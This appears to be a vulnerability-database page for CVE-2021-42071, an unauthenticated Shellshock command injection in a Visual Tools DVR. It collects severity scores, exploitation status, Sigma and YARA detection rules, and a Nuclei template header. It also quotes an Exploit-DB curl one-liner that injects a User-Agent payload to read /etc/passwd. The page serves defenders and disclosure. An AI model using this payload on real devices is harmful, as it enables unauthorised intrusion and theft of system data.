CVE-2021-42071
published 2021-10-07CVE-2021-42071: In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
69.88%
99.3th percentile
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visual-tools | dvr_vx16_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma
GET /cgi-bin/slogin/login.py HTTP/1.1 with User-Agent matching Shellshock pattern: () { :; };yara
rule CVE_2021_42071_Shellshock_DVR { strings: $ua = "() { :; };" $path = "/cgi-bin/slogin/login.py" condition: $ua and $path }- →Detect unauthenticated HTTP GET requests to /cgi-bin/slogin/login.py where the User-Agent header contains Shellshock-style metacharacters: '() { :; };' ↗
- →Alert on HTTP responses returning HTTP 200 with body matching 'root:.*:0:0:' following a request to /cgi-bin/slogin/login.py — this indicates successful /etc/passwd exfiltration via command injection.
- →The exploit leverages the Shellshock (CVE-2014-6271) bash function definition syntax in the User-Agent header to inject OS commands; monitor for '() {' patterns in User-Agent fields on DVR endpoints. ↗
- →No authentication is required; any request to the login.py CGI endpoint with a malicious User-Agent is sufficient for exploitation. Flag all unauthenticated requests to this path with non-standard User-Agent values. ↗
- ·Vulnerability is specific to Visual Tools DVR VX16 firmware version 4.2.28.0 running on Embedded Linux 2.6.35.4; detections should be scoped to this platform/version. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5pjx-33j8-9h49: In Visual Tools DVR VX16 4
ghsa_unreviewed·2022-05-24
CVE-2021-42071 [CRITICAL] CWE-78 GHSA-5pjx-33j8-9h49: In Visual Tools DVR VX16 4
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py Uaer-Agent HTTP header.
VulnCheck
visual-tools dvr_vx16_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-42071 [CRITICAL] visual-tools dvr_vx16_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
visual-tools dvr_vx16_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
Affected: visual-tools dvr_vx16_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.barracuda.com/2024/03/06/threat-spotlight-shellshock-bugs-miners
No detection rules found.
Exploit-DB
Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
exploitdb·2021-07-06·CVSS 9.8
CVE-2021-42071 [CRITICAL] Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
---
# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/
# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
Nuclei
Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
nuclei·CVSS 9.8
CVE-2021-42071 [CRITICAL] Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
id: CVE-2021-42071
info:
name: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
author: gy741
severity: critical
description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Apply the latest security patch or update provided by the vendor
No writeups or analysis indexed.
2021-10-07
Published
Exploited in the wild